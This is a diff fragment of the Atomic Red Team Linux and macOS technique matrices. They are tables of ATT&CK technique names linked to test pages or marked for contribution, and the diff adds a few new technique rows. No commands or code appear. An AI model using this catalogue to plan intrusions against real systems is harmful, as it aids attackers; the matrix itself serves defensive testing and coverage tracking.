+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+|  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Process Discovery](../../T1057/T1057.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) |  | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
+|  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
+|  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
+|  |  | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
@@ -62,6 +64,7 @@
 |  |  |  |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -72,8 +75,10 @@
 |  |  |  |  | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index bdea851471..f756444ca4 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -5,37 +5,38 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
